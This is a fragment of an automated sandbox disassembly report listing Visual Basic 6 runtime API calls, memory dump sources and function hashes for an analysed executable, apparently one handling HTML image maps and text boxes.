                                                        • __vbaStrMove.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E6D
                                                        • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E70
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E77
                                                        • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E83
                                                        • __vbaStrCat.MSVBVM60(0040F42C,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E95
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421E9C
                                                        • __vbaForEachCollObj.MSVBVM60(004113E8,?,?,0042232B), ref: 00421EAF
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004113E8,00000024), ref: 00421EDE
                                                        • __vbaStrCat.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421EEC
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421EF3
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421EF8
                                                        • __vbaNextEachCollObj.MSVBVM60(004113E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F07
                                                        • __vbaStrCat.MSVBVM60(</map>,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F18
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F1F
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F27
                                                        • __vbaFreeObj.MSVBVM60(00421F71,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00421F60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Move$Free$CopyList$#537CollEach$CheckHresultNext
                                                        • String ID: id=$ name=$</map>$<map
                                                        • API String ID: 610381827-1714015726
                                                        • Opcode ID: 450288ce74c810fd709b4d8f44dcdf07e54d43e21bfae3aba7d3258c40b872f7
                                                        • Instruction ID: e9aae58b173deed54bc321b37fa2da337e912f7303d6618c3da271415f179815
                                                        • Opcode Fuzzy Hash: 450288ce74c810fd709b4d8f44dcdf07e54d43e21bfae3aba7d3258c40b872f7
                                                        • Instruction Fuzzy Hash: 05513071E00219AFCB04DBA4DD85DEEB7B8FF88700B10812AE516B7264DB74AD05CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60 ref: 00421415
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401A00,00411840,00000040), ref: 00421430
                                                        • __vbaStrCmp.MSVBVM60(?,?), ref: 0042143E
                                                        • __vbaFreeStr.MSVBVM60 ref: 00421451
                                                        • __vbaStrMove.MSVBVM60(?,0040F3C8), ref: 00421479
                                                        • __vbaStrCopy.MSVBVM60 ref: 00421480
                                                        • __vbaFreeStr.MSVBVM60 ref: 00421485
                                                        • __vbaStrMove.MSVBVM60(?,name), ref: 0042149E
                                                        • __vbaStrCopy.MSVBVM60 ref: 004214A5
                                                        • __vbaFreeStr.MSVBVM60 ref: 004214AA
                                                        • __vbaStrCopy.MSVBVM60 ref: 004214B6
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401A00,00411840,00000020), ref: 004214CD
                                                        • __vbaInStr.MSVBVM60(00000000,<area,?,00000001), ref: 004214E6
                                                        • __vbaInStr.MSVBVM60(00000000,<area,?,00000001,?), ref: 0042150F
                                                        • #631.MSVBVM60(?,00000000), ref: 00421516
                                                        • __vbaStrMove.MSVBVM60 ref: 00421521
                                                        • __vbaFreeVar.MSVBVM60 ref: 00421526
                                                        • __vbaInStr.MSVBVM60(00000000,0040F42C,?,00000001), ref: 00421539
                                                        • #616.MSVBVM60(?,00000000), ref: 00421540
                                                        • __vbaStrMove.MSVBVM60 ref: 0042154B
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401A00,00411840,0000001C), ref: 0042156A
                                                        • __vbaFreeObj.MSVBVM60 ref: 00421573
                                                        • __vbaLenBstr.MSVBVM60(?,0000000A), ref: 0042158F
                                                        • #631.MSVBVM60(?,00000000), ref: 0042159A
                                                        • __vbaStrMove.MSVBVM60 ref: 004215A5
                                                        • __vbaFreeVar.MSVBVM60 ref: 004215AA
                                                        • __vbaFreeStr.MSVBVM60(004215EE), ref: 004215E1
                                                        • __vbaFreeStr.MSVBVM60 ref: 004215E6
                                                        • __vbaFreeStr.MSVBVM60 ref: 004215EB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$Move$Copy$CheckHresult$#631$#616Bstr
                                                        • String ID: <area$name
                                                        • API String ID: 1458531261-1697160873
                                                        • Opcode ID: 586ebb249d294156a0f06dd8f4c151758e4972a44872811e8f23a2d94619b2e2
                                                        • Instruction ID: 395a243d5fbdf9734aafbe1a0e5a0c4a0a956fe9094fa97e0b74d127df4a6424
                                                        • Opcode Fuzzy Hash: 586ebb249d294156a0f06dd8f4c151758e4972a44872811e8f23a2d94619b2e2
                                                        • Instruction Fuzzy Hash: 8C613371A00219ABDB04EFA5DD85EEEBBB9FF58700F10412AF502B72A0DB749946CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(72A26A76,00401978,72A26C30), ref: 004245C2
                                                        • __vbaStrCopy.MSVBVM60 ref: 004245CA
                                                          • Part of subcall function 004241F0: __vbaStrCopy.MSVBVM60(00000001,00000000,72A26C30), ref: 0042423F
                                                          • Part of subcall function 004241F0: __vbaStrCopy.MSVBVM60 ref: 00424247
                                                          • Part of subcall function 004241F0: __vbaStrCat.MSVBVM60(00411B14,?,?,00000001), ref: 00424258
                                                          • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 00424269
                                                          • Part of subcall function 004241F0: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0042426D
                                                          • Part of subcall function 004241F0: __vbaFreeStr.MSVBVM60 ref: 0042427B
                                                          • Part of subcall function 004241F0: __vbaLenBstr.MSVBVM60(?), ref: 0042428D
                                                          • Part of subcall function 004241F0: #631.MSVBVM60(?,-00000002,?,00000001), ref: 004242C2
                                                          • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 004242CD
                                                          • Part of subcall function 004241F0: #537.MSVBVM60(00000022,00000000), ref: 004242D2
                                                          • Part of subcall function 004241F0: __vbaStrMove.MSVBVM60 ref: 004242DD
                                                          • Part of subcall function 004241F0: __vbaInStr.MSVBVM60(00000000,00000000), ref: 004242E1
                                                          • Part of subcall function 004241F0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004242FD
                                                          • Part of subcall function 004241F0: __vbaFreeVar.MSVBVM60 ref: 00424309
                                                        • __vbaStrMove.MSVBVM60(?,?), ref: 004245E6
                                                        • __vbaStrCmp.MSVBVM60(0040F38C,00000000,?,?), ref: 004245EE
                                                        • __vbaFreeStr.MSVBVM60(?,?), ref: 00424600
                                                        • __vbaStrCmp.MSVBVM60(0040F38C,?,?,?), ref: 00424618
                                                        • __vbaLenBstr.MSVBVM60(00000000,?,?), ref: 00424629
                                                        • #616.MSVBVM60(?,-00000001,?,?), ref: 0042463C
                                                        • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424647
                                                        • __vbaStrCat.MSVBVM60(004117A4,00000000,?,-00000001,?,?), ref: 00424655
                                                        • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 0042465C
                                                        • __vbaStrCat.MSVBVM60(?,00000000,?,-00000001,?,?), ref: 00424663
                                                        • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 0042466A
                                                        • __vbaStrCat.MSVBVM60(00411B14,00000000,?,-00000001,?,?), ref: 00424672
                                                        • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424679
                                                          • Part of subcall function 00424480: __vbaStrCopy.MSVBVM60(?,00000000,72A1A274), ref: 004244C0
                                                          • Part of subcall function 00424480: #537.MSVBVM60(00000022), ref: 004244CE
                                                          • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244DB
                                                          • Part of subcall function 00424480: __vbaStrCat.MSVBVM60(?,00000000), ref: 004244E8
                                                          • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244EF
                                                          • Part of subcall function 00424480: #537.MSVBVM60(00000022,00000000), ref: 004244F4
                                                          • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 004244FB
                                                          • Part of subcall function 00424480: __vbaStrCat.MSVBVM60(00000000), ref: 004244FE
                                                          • Part of subcall function 00424480: __vbaStrMove.MSVBVM60 ref: 00424505
                                                          • Part of subcall function 00424480: __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00424515
                                                          • Part of subcall function 00424480: __vbaFreeStr.MSVBVM60(00424556), ref: 0042454F
                                                        • __vbaStrMove.MSVBVM60(?,00000000,?,-00000001,?,?), ref: 0042468A
                                                        • __vbaStrCat.MSVBVM60(00000000,?,-00000001,?,?), ref: 0042468D
                                                        • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424694
                                                        • __vbaStrCat.MSVBVM60(0040F42C,00000000,?,-00000001,?,?), ref: 0042469C
                                                        • __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 004246A2
                                                        • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?,?,-00000001,?,?), ref: 004246BE
                                                        • __vbaStrCat.MSVBVM60(00411B14,?,?,00000001,?,?), ref: 004246DF
                                                        • __vbaStrMove.MSVBVM60(?,00000001,?,?), ref: 004246EA
                                                        • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001,?,?), ref: 004246EF
                                                        • __vbaFreeStr.MSVBVM60(?,00000001,?,?), ref: 00424703
                                                        • #631.MSVBVM60(?,-00000002,?,00000001,?,00000001,?,?), ref: 0042472C
                                                        • __vbaStrMove.MSVBVM60(?,-00000002,?,00000001,?,00000001,?,?), ref: 00424737
                                                        • #537.MSVBVM60(00000022,00000000,?,-00000002,?,00000001,?,00000001,?,?), ref: 0042473C
                                                        • __vbaStrMove.MSVBVM60(?,-00000002,?,00000001,?,00000001,?,?), ref: 00424747
                                                        • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000002,?,00000001,?,00000001,?,?), ref: 0042474C
                                                        • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000002,?,00000001,?,00000001,?,?), ref: 0042475E
                                                        • __vbaFreeVar.MSVBVM60(00000001,?,?), ref: 0042476A
                                                        • __vbaMidStmtBstr.MSVBVM60(00000000,?,00000000,-00000001,00420F4F,?,?), ref: 00424779
                                                        • __vbaFreeStr.MSVBVM60(004247C4,?,?), ref: 004247BC
                                                        • __vbaFreeStr.MSVBVM60(?,?), ref: 004247C1
                                                        • __vbaErrorOverflow.MSVBVM60(?,00000001,?,?), ref: 004247D7
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Move$Free$Copy$#537List$Bstr$#631$#616ErrorOverflowStmt
                                                        • String ID:
                                                        • API String ID: 3013909437-0
                                                        • Opcode ID: 1b50d63d3f28da341f3a8f36a6f4667ce9a3505b347295e2f15f4c79e5da5c8b
                                                        • Instruction ID: 6fcb04252a0202c2b8f8ca5fd4339ddcf00f1a8ffd7dc002fb0493665977cebf
                                                        • Opcode Fuzzy Hash: 1b50d63d3f28da341f3a8f36a6f4667ce9a3505b347295e2f15f4c79e5da5c8b
                                                        • Instruction Fuzzy Hash: 7F812075A00118AFCB04DFA4DD45EEEBBB9EF89700F10412AE906F72A4DB746D05CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B83C,?,00000000,?,72A1A274), ref: 0041E7EA
                                                        • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,72A1A274), ref: 0041E7F7
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041E825
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041E84C
                                                        • __vbaVarTextCmpNe.MSVBVM60(?,?,?), ref: 0041E85D
                                                        • __vbaVarVargNofree.MSVBVM60(?,00000000), ref: 0041E870
                                                        • __vbaVarTextCmpLt.MSVBVM60(?,00000000), ref: 0041E87B
                                                        • __vbaVarAnd.MSVBVM60(?,00000000), ref: 0041E889
                                                        • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041E890
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041E8A2
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041E8B8
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041E8DD
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041E8EE
                                                        • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041E90B
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,0000001C), ref: 0041E930
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041E935
                                                        • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041E951
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000024), ref: 0041E97D
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041E988
                                                        • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041E99A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,0000002C), ref: 0041E9BF
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041E9C4
                                                        • __vbaObjIs.MSVBVM60(?,00000000), ref: 0041E9CC
                                                        • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041E9E7
                                                        • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041E9F1
                                                        • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041EA0E
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,0000002C), ref: 0041EA32
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041EA3D
                                                        • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041EA4F
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000024), ref: 0041EA74
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041EA79
                                                        • __vbaFreeObj.MSVBVM60(0041EAD3), ref: 0041EAC6
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041EACB
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041EAD0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$CheckHresult$New2$Addref$Text$BoolListNofreeNullVarg
                                                        • String ID:
                                                        • API String ID: 752550406-0
                                                        • Opcode ID: 1139342c647738dbdab977a375024fb19047a038a2999aba97aa880820713a15
                                                        • Instruction ID: e98e6f880182b5f5a29ce2df0fb0223a04d9758aa2842847bc1bd9166e2d84a1
                                                        • Opcode Fuzzy Hash: 1139342c647738dbdab977a375024fb19047a038a2999aba97aa880820713a15
                                                        • Instruction Fuzzy Hash: 53B12BB5A00219AFDB10DBA5CD85EEEB7B8FF48B00F10411AF505F72A0D778A945CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaVarTstEq.MSVBVM60(?,?,00001BBC,00000000,0000000C), ref: 004223E0
                                                        • __vbaStrVarVal.MSVBVM60(?,?,00000001), ref: 004223F9
                                                        • #618.MSVBVM60(00000000), ref: 00422400
                                                        • __vbaStrMove.MSVBVM60 ref: 0042240B
                                                        • #527.MSVBVM60(00000000), ref: 00422412
                                                        • __vbaVarMove.MSVBVM60 ref: 00422438
                                                        • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00422444
                                                        • __vbaVarCat.MSVBVM60(?,?,?), ref: 0042245C
                                                        • __vbaVarMove.MSVBVM60 ref: 00422467
                                                        • __vbaLenVar.MSVBVM60(?,?), ref: 00422488
                                                        • __vbaVarAdd.MSVBVM60(?,00000002,00000000), ref: 0042249D
                                                        • __vbaVarLateMemSt.MSVBVM60(?,SelStart), ref: 004224C7
                                                        • __vbaFreeVar.MSVBVM60 ref: 004224D3
                                                        • __vbaVarCopy.MSVBVM60 ref: 004224F2
                                                        • __vbaSetSystemError.MSVBVM60(00000000,00000104), ref: 0042250D
                                                        • __vbaVarCopy.MSVBVM60 ref: 00422524
                                                        • __vbaVarMove.MSVBVM60 ref: 0042254B
                                                        • __vbaI4Var.MSVBVM60(?,00422B56,00000000,00000104), ref: 0042255B
                                                        • __vbaSetSystemError.MSVBVM60(00000000), ref: 00422569
                                                        • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 00422595
                                                        • __vbaVarCopy.MSVBVM60 ref: 004225BD
                                                        • __vbaVarMove.MSVBVM60 ref: 004225DC
                                                        • __vbaFreeVar.MSVBVM60(00422646), ref: 0042262A
                                                        • __vbaFreeVar.MSVBVM60 ref: 0042262F
                                                        • __vbaFreeVar.MSVBVM60 ref: 00422634
                                                        • __vbaFreeVar.MSVBVM60 ref: 00422639
                                                        • __vbaFreeVar.MSVBVM60 ref: 0042263E
                                                        • __vbaFreeVar.MSVBVM60 ref: 00422643
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$Move$Copy$ErrorSystem$#527#618LateList
                                                        • String ID: SelStart
                                                        • API String ID: 1057817874-2158561977
                                                        • Opcode ID: 496c829554f2279cb53492a7595390ea13f8adffaf09cafaeb481c82134aa819
                                                        • Instruction ID: 71a91a91a77c6061a498dc32991692de7b09fed06f21a730561632b8975efec3
                                                        • Opcode Fuzzy Hash: 496c829554f2279cb53492a7595390ea13f8adffaf09cafaeb481c82134aa819
                                                        • Instruction Fuzzy Hash: 508118B1C002299FCB64DFA5DE84BEDBBB9FF44304F10819AE409A7260DB745A89CF55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaSetSystemError.MSVBVM60(?,?), ref: 004193C6
                                                        • __vbaSetSystemError.MSVBVM60(?), ref: 004193D3
                                                        • __vbaFpI4.MSVBVM60 ref: 00419446
                                                        • __vbaFpI4.MSVBVM60 ref: 0041949B
                                                        • __vbaI2I4.MSVBVM60 ref: 004194BE
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 004194DD
                                                        • __vbaI2I4.MSVBVM60(?), ref: 00419501
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,00000034), ref: 0041953B
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 00419550
                                                        • __vbaI2I4.MSVBVM60 ref: 00419560
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 0041957F
                                                        • __vbaI2I4.MSVBVM60(?), ref: 004195A8
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,00000034), ref: 004195DD
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 004195F2
                                                        • __vbaSetSystemError.MSVBVM60(?,?,0000000A,0000000F), ref: 0041962E
                                                        • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041963C
                                                        • __vbaI4Var.MSVBVM60(?,?,?,00000000,00000000,00000003), ref: 00419657
                                                        • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00419672
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419677
                                                        • __vbaFreeObj.MSVBVM60(004196A2), ref: 0041969B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$ErrorSystem$CheckFreeHresultNew2$CallLate
                                                        • String ID: eXTEditBox1
                                                        • API String ID: 3237385300-922357469
                                                        • Opcode ID: e180f32e81e3e6d767502f67dfbe6c3a4e5c335ffba80cc4171509e319854b3b
                                                        • Instruction ID: c710e037b903dfe6e1e3dc984430160e750ec2e9efa47df8a5809f75c2f4972f
                                                        • Opcode Fuzzy Hash: e180f32e81e3e6d767502f67dfbe6c3a4e5c335ffba80cc4171509e319854b3b
                                                        • Instruction Fuzzy Hash: 2DC16F70A00208EFDB14DFA9D984BDEBBB4FF58300F10806EE545A72A0D779A945CF69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401D26), ref: 0042191E
                                                        • __vbaFailedFriend.MSVBVM60(?,?,?,?,00401D26), ref: 0042195C
                                                        • __vbaOnError.MSVBVM60(000000FF), ref: 00421A32
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,00000034), ref: 00421A67
                                                        • __vbaStrI4.MSVBVM60(00000001,?), ref: 00421A8D
                                                        • __vbaStrMove.MSVBVM60 ref: 00421A98
                                                        • __vbaStrCat.MSVBVM60(00000000), ref: 00421A9F
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411580,0000001C), ref: 00421ADD
                                                        • __vbaCastObjVar.MSVBVM60(?,004113E8), ref: 00421AFE
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00421B09
                                                        • __vbaFreeStr.MSVBVM60 ref: 00421B12
                                                        • __vbaFreeObj.MSVBVM60 ref: 00421B1B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$CastChkstkErrorFailedFriendMove
                                                        • String ID: circ_$poly_$rect_
                                                        • API String ID: 3373357413-2379982697
                                                        • Opcode ID: 9dcd251e9e368f8c6c461c7d85bc313f304b735d2f2cec1fe12a740e098b7f12
                                                        • Instruction ID: 43e21aa390423ac4bb5be4ef763bcdf32f7e6bd7be1f21c6f9aae0b9eacb4217
                                                        • Opcode Fuzzy Hash: 9dcd251e9e368f8c6c461c7d85bc313f304b735d2f2cec1fe12a740e098b7f12
                                                        • Instruction Fuzzy Hash: B7813EB0900218EFDB04DFA4DA58BDEBBB5FF18304F208159E506BB2A0DB785A85DF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaAryConstruct2.MSVBVM60(?,00411AC8,00000008,00001C20,00000000,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 00422FAC
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FC0
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FCD
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FDA
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FE7
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00422FF4
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423001
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042300E
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042301B
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423028
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423035
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423042
                                                        • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042305C
                                                        • __vbaStrCat.MSVBVM60(?,004117A4,?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042306E
                                                        • __vbaStrMove.MSVBVM60(?,004117A4,?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 00423079
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 0042308F
                                                        • __vbaAryDestruct.MSVBVM60(00000000,?,004230B5,?,?,?,?,?,?,?,?,?,00000000,00401D26,00422B93), ref: 004230AE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
